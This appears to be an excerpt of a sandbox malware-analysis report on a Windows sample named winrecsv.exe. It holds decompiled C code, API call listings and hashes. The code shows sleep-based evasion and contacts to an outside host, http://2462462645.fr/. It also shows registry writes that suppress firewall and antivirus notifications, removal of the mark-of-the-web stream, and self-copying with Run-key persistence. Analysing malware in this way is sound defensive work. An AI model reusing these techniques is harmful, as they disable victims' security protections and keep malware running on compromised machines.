                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
                                                                                  • String ID:
                                                                                  • API String ID: 3943618503-0
                                                                                  • Opcode ID: 47eef5c5e90b0bbc2b88e8c85aea6492e68199bf9c12c4048a90d4587259c5ac
                                                                                  • Instruction ID: 22c9fd0d58bb21ad2c775b164571bc0b545b0ff679c75b8c31fe2abd1e05f37e
                                                                                  • Opcode Fuzzy Hash: 47eef5c5e90b0bbc2b88e8c85aea6492e68199bf9c12c4048a90d4587259c5ac
                                                                                  • Instruction Fuzzy Hash: E1119170640300AFE7509FB4DC86B5B7AE0EF48710F54897AFA58DE2D2E6F8D844875A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 58%
                                                                                  			E0040AB50(void* __ecx, BYTE* _a4, int _a8) {
                                                                                  				long* _v8;
                                                                                  				long** _t6;
                                                                                  
                                                                                  				_t6 =  &_v8;
                                                                                  				__imp__CryptAcquireContextW(_t6, 0, 0, 1, 0xf0000040, __ecx); // executed
                                                                                  				if(_t6 != 0) {
                                                                                  					CryptGenRandom(_v8, _a8, _a4);
                                                                                  					return CryptReleaseContext(_v8, 0);
                                                                                  				}
                                                                                  				return _t6;
                                                                                  			}

                                                                                  APIs
                                                                                  • CryptAcquireContextW.ADVAPI32(0040688C,00000000,00000000,00000001,F0000040,?,?,0040ABA9,0040688C,00000004,?,?,0040ABDE,000000FF), ref: 0040AB63
                                                                                  • CryptGenRandom.ADVAPI32(0040688C,?,00000000,?,?,0040ABA9,0040688C,00000004,?,?,0040ABDE,000000FF), ref: 0040AB79
                                                                                  • CryptReleaseContext.ADVAPI32(0040688C,00000000,?,?,0040ABA9,0040688C,00000004,?,?,0040ABDE,000000FF), ref: 0040AB85
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Crypt$Context$AcquireRandomRelease
                                                                                  • String ID:
                                                                                  • API String ID: 1815803762-0
                                                                                  • Opcode ID: eda8b9e6150e8489936fffc678bcc37347e2bbaac9c88bad9fce2d1065103978
                                                                                  • Instruction ID: 1452194909b8924a7c7626270c55186fff6dc5d04cba850d0a96534bec71c57f
                                                                                  • Opcode Fuzzy Hash: eda8b9e6150e8489936fffc678bcc37347e2bbaac9c88bad9fce2d1065103978
                                                                                  • Instruction Fuzzy Hash: 03E09275600308BBDB14CBE1EC49F9A777CAB08740F108154BB0997280DAB1EA40C7A8
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

C-Code - Quality: 98%
			_entry_() {
				short _v524;
				char _v528;
				int _v532;
				int _v536;
				char _v1060;
				void* _v1064;
				char _v1588;
				short _v2108;
				intOrPtr _v2112;
				short _v2636;
				void* _v2640;
				struct HWND__* _v2644;
				long _v2648;
				struct HWND__* _v2652;
				void* _v2656;
				intOrPtr _v2660;
				long _v2664;
				void* _v2668;
				intOrPtr _v2672;
				intOrPtr _v2676;
				struct HWND__* _v2680;
				int _v2684;
				int _v2688;
				struct HWND__* _v2692;
				struct HWND__* _v2696;
				int _v2700;
				char _v3100;
				intOrPtr* _v3104;
				int _v3108;
				short _v3110;
				short _v3112;
				int _v3116;
				int _v3120;
				intOrPtr* _v3124;
				intOrPtr _v3128;
				short _v3130;
				signed int _v3136;
				intOrPtr* _v3140;
				intOrPtr _v3144;
				short _v3146;
				signed int _v3152;
				void* _t182;
				int _t190;
				long _t191;
				long _t193;
				signed char _t194;
				void* _t203;
				intOrPtr _t206;
				intOrPtr _t210;
				signed char _t253;
				signed char _t264;
				struct HWND__* _t271;
				short _t367;
				intOrPtr _t371;
				short _t397;
				intOrPtr _t413;
				intOrPtr _t414;
				void* _t446;
				void* _t447;
				void* _t454;

				Sleep(0x1b58); // executed  (analyst note: 7000 ms start-up delay)
				_v536 = 0;
				_v2112 = 0x2332;
				// analyst note: the window and file names in this loop are junk strings; when FindWindowA
				// fails the loop only increments, so the block acts as padding / sleep-based evasion
				while(_v536 < _v2112) {
					_t271 = FindWindowA("579795729858927452784", 0); // executed
					_v2644 = _t271;
					if(_v2644 == 0) {
						L40:
						_v536 = _v536 + 1;
						continue;
					}
					Sleep(0x3e8);
					MoveFileA("feu8gf8g2gf8g2fg", "579795729858927452784");
					MoveFileA("feu8gf8g2gf8g2fg", "579795729858927452784");
					_v2680 = FindWindowA("579795729858927452784", 0);
					if(_v2680 != 0) {
						Sleep(0x3e8);
						MoveFileA("feu8gf8g2gf8g2fg", "579795729858927452784");
					}
					Sleep(0x3e8);
					_v2684 = 0;
					while(_v2684 < 0x7d0) {
						DeleteFileW(L"argarhargafafargh");
						MoveFileW(L"4yy4w4yw4fwgwgw", L"ffag8f2g8fg82g8f8g8fg");
						Sleep(0xbb8);
						DeleteFileW(L"argarhargafafargh");
						MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
						MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
						Sleep(0xfa0);
						DeleteFileA("579795729858927452784");
						_v2684 = _v2684 + 1;
					}
					DeleteFileW(L"4yy4w4yw4fwgwgw");
					MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
					DeleteFileW(L"argarhargafafargh");
					MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
					DeleteFileW(L"argarhargafafargh");
					Sleep(0xbb8);
					Sleep(0xbb8);
					_v2668 = InternetOpenA("ttyu8ruy8uy8u8yu", 0, 0, 0, 0);
					DeleteFileW(L"ffag8f2g8fg82g8f8g8fg");
					if(_v2668 == 0) {
						L16:
						Sleep(0x7d0);
						InternetCloseHandle(_v2668);
						Sleep(0x2710);
						ShowWindow(_v2644, 1);
						SetForegroundWindow(_v2644);
						MoveFileA("579795729858927452784", "2dgd828d8g8fg8g8g");
						_v2676 = 0x37;
						_v2660 = 0x2c;
						_v2672 = _v2676 + _v2660;
						if(_v2672 < 0x2328) {
							MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
							DeleteFileW(L"argarhargafafargh");
							MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
							Sleep(0x7d0);
							DeleteFileA("2dgd828d8g8fg8g8g");
							_v2692 = FindWindowA("aefafugaugfgauegf", 0);
							_v2668 = InternetOpenA("ttyu8ruy8uy8u8yu", 0, 0, 0, 0);
							if(_v2668 != 0) {
								MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
								MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
								_v2656 = InternetOpenUrlA(_v2668, "http://2462462645.fr/", 0, 0, 0, 0);
								if(_v2656 != 0) {
									DeleteFileW(L"argarhargafafargh");
									Sleep(0x1388);
									DeleteFileA("579795729858927452784");
									MoveFileW(L"4yy4w4yw4fwgwgw", L"argarhrharharfafrahth");
									Sleep(0xfa0);
									DeleteFileW(L"4yy4w4yw4fwgwgw");
								}
								InternetCloseHandle(_v2656);
								Sleep(0xdac);
							}
							InternetCloseHandle(_v2668);
							Sleep(0xfa0);
							if(_v2692 != 0) {
								ShowWindow(_v2692, 0);
								DeleteFileW(L"argarhargafafargh");
								SetForegroundWindow(_v2692);
								Sleep(0x1388);
								_v2668 = InternetOpenA("ttyu8ruy8uy8u8yu", 0, 0, 0, 0);
								if(_v2668 != 0) {
									_v2656 = InternetOpenUrlA(_v2668, "http://2462462645.fr/", 0, 0, 0, 0);
									if(_v2656 != 0) {
										MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
										Sleep(0x2710);
										DeleteFileW(L"4yy4w4yw4fwgwgw");
									}
									InternetCloseHandle(_v2656);
									DeleteFileW(L"argarhargafafargh");
									Sleep(0x64);
									MoveFileA("feu8gf8g2gf8g2fg", "579795729858927452784");
									DeleteFileW(L"argarhargafafargh");
									MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
									DeleteFileA("2dgd828d8g8fg8g8g");
								}
								InternetCloseHandle(_v2668);
							}
						}
						_v2664 = 0x1388;
						_v2648 = 0x1f4;
						while(_v2664 > _v2648) {
							_v2696 = FindWindowA("2dgd828d8g8fg8g8g", 0);
							if(_v2696 != 0) {
								Sleep(0x7d0);
								DeleteFileW(L"argarhargafafargh");
								MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
								Sleep(0x1388);
								Sleep(0x1388);
								_v2648 = _v2648 + 1;
							}
						}
						if(PathFileExistsA("aefafugaugfgauegf") != 0) {
							DeleteFileA("579795729858927452784");
							DeleteFileW(L"4yy4w4yw4fwgwgw");
							Sleep(0x1f4);
							DeleteFileW(L"4yy4w4yw4fwgwgw");
							DeleteFileW(L"4yy4w4yw4fwgwgw");
							DeleteFileW(L"4yy4w4yw4fwgwgw");
							DeleteFileW(L"4yy4w4yw4fwgwgw");
							DeleteFileW(L"4yy4w4yw4fwgwgw");
							DeleteFileW(L"4yy4w4yw4fwgwgw");
							MoveFileW(L"4yy4w4yw4fwgwgw", L"ffag8f2g8fg82g8f8g8fg");
						}
						_v2652 = FindWindowA("aefyaiegfayegfg", 0);
						if(_v2652 != 0) {
							DeleteFileW(L"4yy4w4yw4fwgwgw");
							SetForegroundWindow(_v2644);
							ShowWindow(_v2644, 1);
							Sleep(0x3a98);
							MoveFileA("feu8gf8g2gf8g2fg", "aefafugaugfgauegf");
							DeleteFileA("579795729858927452784");
							Sleep(0x1f4);
							DeleteFileW(L"4yy4w4yw4fwgwgw");
							DeleteFileW(L"4yy4w4yw4fwgwgw");
							DeleteFileW(L"argarhargafafargh");
						}
						_v2700 = 0;
						while(_v2700 < 0xfa0) {
							MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
							DeleteFileW(L"4yy4w4yw4fwgwgw");
							Sleep(0x2328);
							MoveFileW(L"argarhrharharfafrahth", L"4yy4w4yw4fwgwgw");
							_v2700 = _v2700 + 1;
						}
						goto L40;
					}
					DeleteFileW(L"argarhargafafargh");
					MoveFileA("feu8gf8g2gf8g2fg", "579795729858927452784");
					Sleep(0x1388);
					DeleteFileW(L"ffag8f2g8fg82g8f8g8fg");
					Sleep(0xbb8);
					DeleteFileW(L"4yy4w4yw4fwgwgw");
					_v2656 = InternetOpenUrlA(_v2668, "http://2462462645.fr/", 0, 0, 0, 0);
					Sleep(0xbb8);
					if(_v2656 == 0) {
						L15:
						InternetCloseHandle(_v2656);
						DeleteFileW(L"4yy4w4yw4fwgwgw");
						goto L16;
					}
					_v2688 = 0;
					while(_v2688 < 0x7d0) {
						MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
						Sleep(0x7d0);
						MoveFileA("feu8gf8g2gf8g2fg", "579795729858927452784");
						Sleep(0xfa0);
						_v2688 = _v2688 + 1;
					}
					goto L15;
				}
				_t182 = CreateMutexA(0, 0, "984658"); // executed
				_v2640 = _t182;
				// analyst note: 0xb7 = ERROR_ALREADY_EXISTS; the main body below is skipped when the mutex is already held
				if(GetLastError() != 0xb7) {
					_v1064 = 0;
					_v528 = 1;
					GetModuleFileNameW(0, "C:\Windows\winrecsv.exe", 0x105);
					_v532 = PathFindFileNameW("C:\Windows\winrecsv.exe");
					// analyst note: removes the ":Zone.Identifier" alternate data stream (mark-of-the-web) from its own image
					wsprintfW( &_v524, L"%s:Zone.Identifier", "C:\Windows\winrecsv.exe");
					_t447 = _t446 + 0xc;
					DeleteFileW( &_v524); // executed
					ExpandEnvironmentStringsW(L"%userprofile%",  &_v2636, 0x104);
					_v3104 = L"winrecsv.exe";
					_v3108 = _v532;
					while(1) {
						_t190 = _v3108;
						_t367 =  *_t190;
						_v3110 = _t367;
						if(_t367 !=  *_v3104) {
							break;
						}
						if(_v3110 == 0) {
							L48:
							_v3116 = 0;
							L50:
							_v3120 = _v3116;
							if(_v3120 == 0) {
								L67:
								Sleep(0x1f4); // executed
								// analyst note: 0x80000002 = HKEY_LOCAL_MACHINE, 0x20006 = KEY_WRITE; each value is written as REG_DWORD (4) = 1,
								// which suppresses Security Center firewall / antivirus / update notifications
								_t191 = RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Security Center", 0, 0x20006,  &_v1064); // executed
								if(_t191 == 0) {
									RegSetValueExA(_v1064, "FirewallOverride", 0, 4,  &_v528, 4); // executed
									RegSetValueExA(_v1064, "FirewallDisableNotify", 0, 4,  &_v528, 4); // executed
									RegSetValueExA(_v1064, "AntiSpywareOverride", 0, 4,  &_v528, 4); // executed
									RegSetValueExA(_v1064, "AntiVirusOverride", 0, 4,  &_v528, 4); // executed
									RegSetValueExA(_v1064, "AntiVirusDisableNotify", 0, 4,  &_v528, 4); // executed
									RegSetValueExA(_v1064, "UpdatesOverride", 0, 4,  &_v528, 4); // executed
									RegSetValueExA(_v1064, "UpdatesDisableNotify", 0, 4,  &_v528, 4); // executed
									RegCloseKey(_v1064); // executed
								}
								_t193 = RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Security Center\\Svc", 0, 0x20006,  &_v1064); // executed
								if(_t193 == 0) {
									RegSetValueExA(_v1064, "FirewallOverride", 0, 4,  &_v528, 4);
									RegSetValueExA(_v1064, "FirewallDisableNotify", 0, 4,  &_v528, 4);
									RegSetValueExA(_v1064, "AntiSpywareOverride", 0, 4,  &_v528, 4);
									RegSetValueExA(_v1064, "AntiVirusOverride", 0, 4,  &_v528, 4);
									RegSetValueExA(_v1064, "AntiVirusDisableNotify", 0, 4,  &_v528, 4);
									RegSetValueExA(_v1064, "UpdatesOverride", 0, 4,  &_v528, 4);
									RegSetValueExA(_v1064, "UpdatesDisableNotify", 0, 4,  &_v528, 4);
									RegCloseKey(_v1064);
								}
								Sleep(0x1f4); // executed
								_t194 = E0040B4A0(); // executed
								if((_t194 & 0x000000ff) != 0) {
									__imp__#115(0x202,  &_v3100); // executed  (analyst note: ws2_32.dll ordinal 115 = WSAStartup, 0x202 = Winsock 2.2)
									wsprintfW("C:\Users\frontdesk\tnnodes.dat", L"%s\\tnnodes.dat",  &_v2636);
									wsprintfW("C:\Users\frontdesk\tncmds.dat", L"%s\\tncmds.dat",  &_v2636);
									CreateThread(0, 0, E00404000, 0, 0, 0); // executed
									Sleep(0x1f4); // executed
									CreateThread(0, 0, E004050B0, 0, 0, 0); // executed
									Sleep(0x1f4); // executed
									CreateThread(0, 0, E00405900, 0, 0, 0); // executed
									Sleep(0x2710); // executed
									E00404200(); // executed
									_t203 = E0040D3D0(); // executed
									E004057B0(_t203,  &_v2636); // executed
									 *0x414e64 = CreateEventA(0, 1, 0, 0); // executed
									_t206 = E0040ABD0( &_v2636); // executed
									 *0x414e6c = _t206;
									 *0x414e68 = E0040BEA0( &_v2636); // executed
									E0040A020(); // executed
									_t413 =  *0x414e68; // 0x930628
									E0040BF50(_t413, 0, E0040C360, 0, 0, 0); // executed
									_t210 =  *0x414e68; // 0x930628
									E0040BF50(_t210, 0, E0040C2C0, 0, 0, 0); // executed
                                                                                  									_t371 =  *0x414e68; // 0x930628
                                                                                  									E0040BF50(_t371, 0, E0040BE50, 0, 0, 0); // executed
                                                                                  									_t414 =  *0x414e68; // 0x930628
                                                                                  									E0040BF50(_t414, 0, E0040BC50, 0, 0, 0); // executed
                                                                                  								}
                                                                                  								return 0;
                                                                                  							}
                                                                                  							if((E0040D4A0() & 0x000000ff) != 1) {
                                                                                  								ExpandEnvironmentStringsW(L"%windir%",  &_v2108, 0x104);
                                                                                  								wsprintfW( &_v1588, L"%s\\%s",  &_v2108, L"winrecsv.exe");
                                                                                  								_t454 = _t447 + 0x10;
                                                                                  								if(CopyFileW(?str?,  &_v1588, 0) == 0) {
                                                                                  									L60:
                                                                                  									Sleep(0x1f4);
                                                                                  									wsprintfW( &_v1060, L"%s\\%s",  &_v2636, L"winrecsv.exe");
                                                                                  									_t447 = _t454 + 0x10;
                                                                                  									if(CopyFileW(?str?,  &_v1060, 0) == 0) {
                                                                                  										goto L67;
                                                                                  									}
                                                                                  									SetFileAttributesW( &_v1060, 3);
                                                                                  									if(RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", 0, 0x20006,  &_v1064) != 0) {
                                                                                  										L65:
                                                                                  										_t253 = E0040D740( &_v1060);
                                                                                  										_t447 = _t447 + 4;
                                                                                  										if((_t253 & 0x000000ff) != 1) {
                                                                                  											goto L67;
                                                                                  										}
                                                                                  										ExitProcess(0);
                                                                                  									}
                                                                                  									_v3140 =  &_v1060;
                                                                                  									_v3144 = _v3140 + 2;
                                                                                  									do {
                                                                                  										_v3146 =  *_v3140;
                                                                                  										_v3140 = _v3140 + 2;
                                                                                  									} while (_v3146 != 0);
                                                                                  									_v3152 = _v3140 - _v3144 >> 1;
                                                                                  									RegSetValueExW(_v1064, L"Windows Settings", 0, 1,  &_v1060, _v3152 + _v3152 + 2);
                                                                                  									RegCloseKey(_v1064);
                                                                                  									goto L65;
                                                                                  								}
                                                                                  								SetFileAttributesW( &_v1588, 3);
                                                                                  								if(RegOpenKeyExW(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", 0, 0x20006,  &_v1064) != 0) {
                                                                                  									L58:
                                                                                  									_t264 = E0040D740( &_v1588);
                                                                                  									_t454 = _t454 + 4;
                                                                                  									if((_t264 & 0x000000ff) != 1) {
                                                                                  										goto L60;
                                                                                  									}
                                                                                  									ExitProcess(0);
                                                                                  								}
                                                                                  								_v3124 =  &_v1588;
                                                                                  								_v3128 = _v3124 + 2;
                                                                                  								do {
                                                                                  									_v3130 =  *_v3124;
                                                                                  									_v3124 = _v3124 + 2;
                                                                                  								} while (_v3130 != 0);
                                                                                  								_v3136 = _v3124 - _v3128 >> 1;
                                                                                  								RegSetValueExW(_v1064, L"Windows Settings", 0, 1,  &_v1588, _v3136 + _v3136 + 2);
                                                                                  								RegCloseKey(_v1064);
                                                                                  								goto L58;
                                                                                  							}
                                                                                  							ExitProcess(0);
                                                                                  						}
                                                                                  						_t190 = _v3108;
                                                                                  						_t397 =  *((intOrPtr*)(_t190 + 2));
                                                                                  						_v3112 = _t397;
                                                                                  						_t86 = _v3104 + 2; // 0x6e0069
                                                                                  						if(_t397 !=  *_t86) {
                                                                                  							break;
                                                                                  						}
                                                                                  						_v3108 = _v3108 + 4;
                                                                                  						_v3104 = _v3104 + 4;
                                                                                  						if(_v3112 != 0) {
                                                                                  							continue;
                                                                                  						}
                                                                                  						goto L48;
                                                                                  					}
                                                                                  					asm("sbb eax, eax");
                                                                                  					asm("sbb eax, 0xffffffff");
                                                                                  					_v3116 = _t190;
                                                                                  					goto L50;
                                                                                  				}
                                                                                  				ExitProcess(0);
                                                                                  			}

                                                                                  0x00405a2e
                                                                                  0x00405a34
                                                                                  0x00405a3e
                                                                                  0x00405a48
                                                                                  0x00405a61
                                                                                  0x00405a67
                                                                                  0x00405a74
                                                                                  0x004061cb
                                                                                  0x004061d4
                                                                                  0x00000000
                                                                                  0x004061d4
                                                                                  0x00405a7f
                                                                                  0x00405a8f
                                                                                  0x00405a9f
                                                                                  0x00405ab2
                                                                                  0x00405abf
                                                                                  0x00405ac6
                                                                                  0x00405ad6
                                                                                  0x00405ad6
                                                                                  0x00405ae1
                                                                                  0x00405ae7
                                                                                  0x00405b02
                                                                                  0x00405b13
                                                                                  0x00405b23
                                                                                  0x00405b2e
                                                                                  0x00405b39
                                                                                  0x00405b49
                                                                                  0x00405b59
                                                                                  0x00405b64
                                                                                  0x00405b6f
                                                                                  0x00405afc
                                                                                  0x00405afc
                                                                                  0x00405b7f
                                                                                  0x00405b8f
                                                                                  0x00405b9a
                                                                                  0x00405baa
                                                                                  0x00405bb5
                                                                                  0x00405bc0
                                                                                  0x00405bcb
                                                                                  0x00405be4
                                                                                  0x00405bef
                                                                                  0x00405bfc
                                                                                  0x00405cf4
                                                                                  0x00405cf9
                                                                                  0x00405d06
                                                                                  0x00405d11
                                                                                  0x00405d20
                                                                                  0x00405d2d
                                                                                  0x00405d3d
                                                                                  0x00405d43
                                                                                  0x00405d4d
                                                                                  0x00405d63
                                                                                  0x00405d73
                                                                                  0x00405d83
                                                                                  0x00405d8e
                                                                                  0x00405d9e
                                                                                  0x00405da9
                                                                                  0x00405db4
                                                                                  0x00405dc7
                                                                                  0x00405de0
                                                                                  0x00405ded
                                                                                  0x00405dfd
                                                                                  0x00405e0d
                                                                                  0x00405e2d
                                                                                  0x00405e3a
                                                                                  0x00405e41
                                                                                  0x00405e4c
                                                                                  0x00405e57
                                                                                  0x00405e67
                                                                                  0x00405e72
                                                                                  0x00405e7d
                                                                                  0x00405e7d
                                                                                  0x00405e8a
                                                                                  0x00405e95
                                                                                  0x00405e95
                                                                                  0x00405ea2
                                                                                  0x00405ead
                                                                                  0x00405eba
                                                                                  0x00405ec9
                                                                                  0x00405ed4
                                                                                  0x00405ee1
                                                                                  0x00405eec
                                                                                  0x00405f05
                                                                                  0x00405f12
                                                                                  0x00405f32
                                                                                  0x00405f3f
                                                                                  0x00405f4b
                                                                                  0x00405f56
                                                                                  0x00405f61
                                                                                  0x00405f61
                                                                                  0x00405f6e
                                                                                  0x00405f79
                                                                                  0x00405f81
                                                                                  0x00405f91
                                                                                  0x00405f9c
                                                                                  0x00405fac
                                                                                  0x00405fb7
                                                                                  0x00405fb7
                                                                                  0x00405fc4
                                                                                  0x00405fc4
                                                                                  0x00405eba
                                                                                  0x00405fca
                                                                                  0x00405fd4
                                                                                  0x00405fde
                                                                                  0x00405ff9
                                                                                  0x00406006
                                                                                  0x0040600d
                                                                                  0x00406018
                                                                                  0x00406028
                                                                                  0x00406033
                                                                                  0x0040603e
                                                                                  0x0040604d
                                                                                  0x0040604d
                                                                                  0x00406053
                                                                                  0x00406062
                                                                                  0x00406069
                                                                                  0x00406074
                                                                                  0x0040607f
                                                                                  0x0040608a
                                                                                  0x00406095
                                                                                  0x004060a0
                                                                                  0x004060ab
                                                                                  0x004060b6
                                                                                  0x004060c1
                                                                                  0x004060d1
                                                                                  0x004060d1
                                                                                  0x004060e4
                                                                                  0x004060f1
                                                                                  0x004060f8
                                                                                  0x00406105
                                                                                  0x00406114
                                                                                  0x0040611f
                                                                                  0x0040612f
                                                                                  0x0040613a
                                                                                  0x00406145
                                                                                  0x00406150
                                                                                  0x0040615b
                                                                                  0x00406166
                                                                                  0x00406166
                                                                                  0x0040616c
                                                                                  0x00406187
                                                                                  0x0040619d
                                                                                  0x004061a8
                                                                                  0x004061b3
                                                                                  0x004061c3
                                                                                  0x00406181
                                                                                  0x00406181
                                                                                  0x00000000
                                                                                  0x00406187
                                                                                  0x00405c07
                                                                                  0x00405c17
                                                                                  0x00405c22
                                                                                  0x00405c2d
                                                                                  0x00405c38
                                                                                  0x00405c43
                                                                                  0x00405c63
                                                                                  0x00405c6e
                                                                                  0x00405c7b
                                                                                  0x00405cdc
                                                                                  0x00405ce3
                                                                                  0x00405cee
                                                                                  0x00000000
                                                                                  0x00405cee
                                                                                  0x00405c7d
                                                                                  0x00405c98
                                                                                  0x00405cae
                                                                                  0x00405cb9
                                                                                  0x00405cc9
                                                                                  0x00405cd4
                                                                                  0x00405c92
                                                                                  0x00405c92
                                                                                  0x00000000
                                                                                  0x00405c98
                                                                                  0x004061e8
                                                                                  0x004061ee
                                                                                  0x004061ff
                                                                                  0x00406209
                                                                                  0x00406213
                                                                                  0x00406229
                                                                                  0x0040623a
                                                                                  0x00406251
                                                                                  0x00406257
                                                                                  0x00406261
                                                                                  0x00406278
                                                                                  0x0040627e
                                                                                  0x0040628e
                                                                                  0x00406294
                                                                                  0x00406294
                                                                                  0x0040629a
                                                                                  0x0040629d
                                                                                  0x004062ad
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004062b7
                                                                                  0x004062ee
                                                                                  0x004062ee
                                                                                  0x00406305
                                                                                  0x0040630b
                                                                                  [Graph node address column omitted: rendering residue of the function graph; listed block addresses span 0x00406203 to 0x00406913]

                                                                                  APIs
                                                                                  • Sleep.KERNELBASE(00001B58), ref: 00405A2E
                                                                                  • FindWindowA.USER32 ref: 00405A61
                                                                                  • Sleep.KERNEL32(000003E8), ref: 00405A7F
                                                                                  • MoveFileA.KERNEL32 ref: 00405A8F
                                                                                  • MoveFileA.KERNEL32 ref: 00405A9F
                                                                                  • FindWindowA.USER32 ref: 00405AAC
                                                                                  • Sleep.KERNEL32(000003E8), ref: 00405AC6
                                                                                  • MoveFileA.KERNEL32 ref: 00405AD6
                                                                                  • Sleep.KERNEL32(000003E8), ref: 00405AE1
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00405B13
                                                                                  • MoveFileW.KERNEL32(4yy4w4yw4fwgwgw,ffag8f2g8fg82g8f8g8fg), ref: 00405B23
                                                                                  • Sleep.KERNEL32(00000BB8), ref: 00405B2E
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00405B39
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405B49
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405B59
                                                                                  • Sleep.KERNEL32(00000FA0), ref: 00405B64
                                                                                  • DeleteFileA.KERNEL32(579795729858927452784), ref: 00405B6F
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 00405B7F
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405B8F
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00405B9A
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405BAA
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00405BB5
                                                                                  • Sleep.KERNEL32(00000BB8), ref: 00405BC0
                                                                                  • Sleep.KERNEL32(00000BB8), ref: 00405BCB
                                                                                  • InternetOpenA.WININET(ttyu8ruy8uy8u8yu,00000000,00000000,00000000,00000000), ref: 00405BDE
                                                                                  • DeleteFileW.KERNEL32(ffag8f2g8fg82g8f8g8fg), ref: 00405BEF
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00405C07
                                                                                  • MoveFileA.KERNEL32 ref: 00405C17
                                                                                  • Sleep.KERNEL32(00001388), ref: 00405C22
                                                                                  • DeleteFileW.KERNEL32(ffag8f2g8fg82g8f8g8fg), ref: 00405C2D
                                                                                  • Sleep.KERNEL32(00000BB8), ref: 00405C38
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 00405C43
                                                                                  • InternetOpenUrlA.WININET(00000000,http://2462462645.fr/,00000000,00000000,00000000,00000000), ref: 00405C5D
                                                                                  • Sleep.KERNEL32(00000BB8), ref: 00405C6E
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405CAE
                                                                                  • Sleep.KERNEL32(000007D0), ref: 00405CB9
                                                                                  • MoveFileA.KERNEL32 ref: 00405CC9
                                                                                  • Sleep.KERNEL32(00000FA0), ref: 00405CD4
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405CE3
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 00405CEE
                                                                                  • Sleep.KERNEL32(000007D0), ref: 00405CF9
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405D06
                                                                                  • Sleep.KERNEL32(00002710), ref: 00405D11
                                                                                  • ShowWindow.USER32(00000000,00000001), ref: 00405D20
                                                                                  • SetForegroundWindow.USER32(00000000), ref: 00405D2D
                                                                                  • MoveFileA.KERNEL32 ref: 00405D3D
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405D83
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00405D8E
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405D9E
                                                                                  • Sleep.KERNEL32(000007D0), ref: 00405DA9
                                                                                  • DeleteFileA.KERNEL32(2dgd828d8g8fg8g8g), ref: 00405DB4
                                                                                  • FindWindowA.USER32 ref: 00405DC1
                                                                                  • InternetOpenA.WININET(ttyu8ruy8uy8u8yu,00000000,00000000,00000000,00000000), ref: 00405DDA
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405DFD
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405E0D
                                                                                  • InternetOpenUrlA.WININET(00000000,http://2462462645.fr/,00000000,00000000,00000000,00000000), ref: 00405E27
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00405E41
                                                                                  • Sleep.KERNEL32(00001388), ref: 00405E4C
                                                                                  • DeleteFileA.KERNEL32(579795729858927452784), ref: 00405E57
